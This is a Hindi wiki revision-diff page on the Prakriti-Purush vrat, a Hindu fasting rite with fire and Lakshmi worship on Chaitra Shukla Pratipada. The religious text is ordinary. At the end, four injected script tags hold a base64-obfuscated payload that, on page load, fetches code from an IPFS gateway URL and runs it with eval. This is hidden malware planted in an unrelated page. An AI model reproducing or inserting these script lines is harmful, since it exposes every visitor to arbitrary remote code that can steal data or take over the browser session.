Difference between revisions of "प्रकृतिपुरुष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[प्रथमा]] को [[उपवास]] और दूसरे दिन पुरुषसूक्त<ref>[[ऋग्वेद]] 10-90)</ref> के साथ पुष्पों आदि से अग्नि पूजा की जाती है।  
+
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[प्रथमा]] को [[उपवास]] और दूसरे दिन पुरुषसूक्त<ref>[[ऋग्वेद]] 10-90</ref> के साथ पुष्पों आदि से अग्नि पूजा की जाती है।  
 
*पुरुष एवं प्रकृति को अग्नि एवं सोम के अनुरूप माना गया है और वे ही [[विष्णु|वासुदेव]] एवं [[लक्ष्मी]] हैं।  
 
*पुरुष एवं प्रकृति को अग्नि एवं सोम के अनुरूप माना गया है और वे ही [[विष्णु|वासुदेव]] एवं [[लक्ष्मी]] हैं।  
 
*श्रीसूक्त के साथ [[लक्ष्मी]] जी का व्रत किया जाता है।
 
*श्रीसूक्त के साथ [[लक्ष्मी]] जी का व्रत किया जाता है।
 
*सोने, चाँदी एवं ताम्र का दान दिया जाता है।
 
*सोने, चाँदी एवं ताम्र का दान दिया जाता है।
 
*कर्ता को केवल दूध एवं घृत खाना चाहिए।  
 
*कर्ता को केवल दूध एवं घृत खाना चाहिए।  
*यह व्रत एक वर्ष तक करने से सभी कामनाओं की पूर्ति एवं मुक्ति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, पृ0 391-92, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*यह व्रत एक वर्ष तक करने से सभी कामनाओं की पूर्ति एवं मुक्ति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, पृ0 391-92, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
  
  

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl prathama ko upavas aur doosare din purushasookt[1] ke sath pushpoan adi se agni pooja ki jati hai.
  • purush evan prakriti ko agni evan som ke anuroop mana gaya hai aur ve hi vasudev evan lakshmi haian.
  • shrisookt ke sath lakshmi ji ka vrat kiya jata hai.
  • sone, chaandi evan tamr ka dan diya jata hai.
  • karta ko keval doodh evan ghrit khana chahie.
  • yah vrat ek varsh tak karane se sabhi kamanaoan ki poorti evan mukti ki prapti hoti hai.[2]


tika tippani aur sandarbh

  1. rrigved 10-90
  2. hemadri (vratakhand 1, pri0 391-92, vishnudharmottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>